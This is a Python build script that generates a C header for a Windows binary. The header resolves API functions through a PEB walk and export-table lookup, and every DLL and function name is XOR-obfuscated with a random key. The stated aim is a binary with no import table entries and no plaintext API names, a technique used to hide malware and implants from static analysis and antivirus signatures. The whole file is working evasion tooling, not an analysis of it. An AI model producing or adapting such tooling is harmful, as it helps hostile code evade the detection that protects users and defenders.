#!/usr/bin/env python3
"""
generate_resolve.py - Generate resolve.h with XOR-obfuscated API string names.

Each API name and DLL name is XOR'd with a unique random single-byte key so
the strings never appear in plaintext in the compiled binary.

The bootstrap order in ResolveAPIs():
  1. GetModuleHandleA("kernel32.dll")   - direct IAT call, string XOR'd
  2. GetProcAddress("GetProcAddress")   - direct IAT call, string XOR'd
  3. All other kernel32 functions       - via p_GetProcAddress, strings XOR'd
  4. Per remaining DLL: LoadLibraryA + resolve all functions

Usage:
  python generate_resolve.py <config.json> <output_dir>
"""

import sys
import os
import json
import random


def xor_encode(s, key):
    """XOR-encode ASCII string + null terminator with single-byte key."""
    data = (s + '\x00').encode('ascii')
    return bytes(b ^ key for b in data)


def c_hex_array(data, var_name):
    """Emit: unsigned char var_name[] = { 0xAA, 0xBB, ... };"""
    hex_bytes = ', '.join(f'0x{b:02X}' for b in data)
    return f'    unsigned char {var_name}[] = {{ {hex_bytes} }};'


def main():
    if len(sys.argv) < 3:
        print("Usage: generate_resolve.py <config.json> <output_dir>")
        sys.exit(1)

    config_path = sys.argv[1]
    output_dir = sys.argv[2]

    with open(config_path, 'r') as f:
        config = json.load(f)

    os.makedirs(output_dir, exist_ok=True)

    functions = config['functions']
    rng = random.SystemRandom()

    # Group by DLL, kernel32 always first
    dll_map = {}
    dll_order = []
    for fn in functions:
        dll = fn['dll'].lower()
        if dll not in dll_map:
            dll_map[dll] = []
            dll_order.append(dll)
        dll_map[dll].append(fn)

    if 'kernel32.dll' in dll_order:
        dll_order.remove('kernel32.dll')
        dll_order.insert(0, 'kernel32.dll')

    lines = [
        '// resolve.h - Auto-generated by generate_resolve.py',
        '// XOR-obfuscated strings: API and DLL names never appear in plaintext',
        '#pragma once',
        '#include <Windows.h>',
        '#include <wincrypt.h>',
        '#include <wininet.h>',
        '#include "peb_walk.h"',
        '',
    ]

    # ── TYPEDEFS ──────────────────────────────────────────────────────────────
    for dll in dll_order:
        label = dll.upper().replace('.', '')
        lines.append(f'// ===== {label} =====')
        lines.append('')
        for fn in dll_map[dll]:
            ret = fn['return_type']
            cc  = fn.get('calling_convention', 'WINAPI')
            params = fn['params']
            # "void" as the only param maps to an empty param list in the typedef
            if params == ['void']:
                param_str = 'void'
            else:
                param_str = ', '.join(params)
            lines.append(f'typedef {ret}({cc}* fn_{fn["name"]})({param_str});')
        lines.append('')

    # ── GLOBAL POINTERS ───────────────────────────────────────────────────────
    lines.append('// ===== GLOBAL FUNCTION POINTERS =====')
    lines.append('')
    for dll in dll_order:
        for fn in dll_map[dll]:
            lines.append(f'fn_{fn["name"]} p_{fn["name"]};')
        lines.append('')

    # ── XOR DECODE HELPER ────────────────────────────────────────────────────
    lines += [
        '// ===== XOR STRING DECODER =====',
        '',
        'static inline void _xdec(unsigned char* buf, int len, unsigned char k) {',
        '    for (int i = 0; i < len; i++) buf[i] ^= k;',
        '}',
        '',
    ]

    # ── ResolveAPIs() ─────────────────────────────────────────────────────────
    lines += [
        '// ===== API RESOLUTION =====',
        '',
        'BOOL ResolveAPIs() {',
        '',
        '    // Bootstrap via PEB walk + export table - zero IAT imports',
    ]

    # Random keys for the two hardcoded bootstrap strings
    k32_key = rng.randint(1, 255)
    gpa_key = rng.randint(1, 255)

    k32_enc = xor_encode('kernel32.dll', k32_key)
    gpa_enc = xor_encode('GetProcAddress', gpa_key)

    lines += [
        c_hex_array(k32_enc, '_s_kernel32dll'),
        f'    _xdec(_s_kernel32dll, sizeof(_s_kernel32dll), 0x{k32_key:02X});',
        '    HMODULE hKernel32 = (HMODULE)PebGetModuleBase((char*)_s_kernel32dll);',
        '    if (!hKernel32) return FALSE;',
        '',
        c_hex_array(gpa_enc, '_s_GetProcAddress'),
        f'    _xdec(_s_GetProcAddress, sizeof(_s_GetProcAddress), 0x{gpa_key:02X});',
        '    p_GetProcAddress = (fn_GetProcAddress)PebGetExportAddr(hKernel32, (char*)_s_GetProcAddress);',
        '    if (!p_GetProcAddress) return FALSE;',
        '',
    ]

    # kernel32.dll - all functions except GetProcAddress (already bootstrapped)
    k32_rest = [f for f in dll_map.get('kernel32.dll', []) if f['name'] != 'GetProcAddress']
    if k32_rest:
        lines.append('    // kernel32.dll - remaining functions')
        for fn in k32_rest:
            key = rng.randint(1, 255)
            enc = xor_encode(fn['name'], key)
            var = f'_s_{fn["name"]}'
            lines += [
                c_hex_array(enc, var),
                f'    _xdec({var}, sizeof({var}), 0x{key:02X});',
                f'    p_{fn["name"]} = (fn_{fn["name"]})p_GetProcAddress(hKernel32, (char*){var});',
                '',
            ]

    # Other DLLs: load via p_LoadLibraryA, resolve each function
    for dll in dll_order:
        if dll == 'kernel32.dll':
            continue

        dll_base = dll.split('.')[0]                          # "advapi32", "wininet"
        dll_safe = dll.replace('.', '_')                      # "advapi32_dll"
        dll_module_var = 'h' + dll_base[0].upper() + dll_base[1:]  # "hAdvapi32"
        dll_s_var = f'_s_{dll_safe}'

        dll_key = rng.randint(1, 255)
        dll_enc = xor_encode(dll, dll_key)

        lines += [
            f'    // {dll}',
            c_hex_array(dll_enc, dll_s_var),
            f'    _xdec({dll_s_var}, sizeof({dll_s_var}), 0x{dll_key:02X});',
            f'    HMODULE {dll_module_var} = (HMODULE)p_LoadLibraryA((char*){dll_s_var});',
            f'    if (!{dll_module_var}) return FALSE;',
            '',
        ]

        for fn in dll_map[dll]:
            key = rng.randint(1, 255)
            enc = xor_encode(fn['name'], key)
            var = f'_s_{fn["name"]}'
            lines += [
                c_hex_array(enc, var),
                f'    _xdec({var}, sizeof({var}), 0x{key:02X});',
                f'    p_{fn["name"]} = (fn_{fn["name"]})p_GetProcAddress({dll_module_var}, (char*){var});',
                '',
            ]

    lines += [
        '    return TRUE;',
        '}',
    ]

    output = '\n'.join(lines) + '\n'

    out_path = os.path.join(output_dir, 'resolve.h')
    with open(out_path, 'w') as f:
        f.write(output)

    total_strings = 2 + sum(len(dll_map[d]) for d in dll_order)  # 2 = k32dll + gpa bootstrap
    print(f"[+] resolve.h    : {total_strings} strings XOR-obfuscated -> {out_path}")


if __name__ == '__main__':
    main()
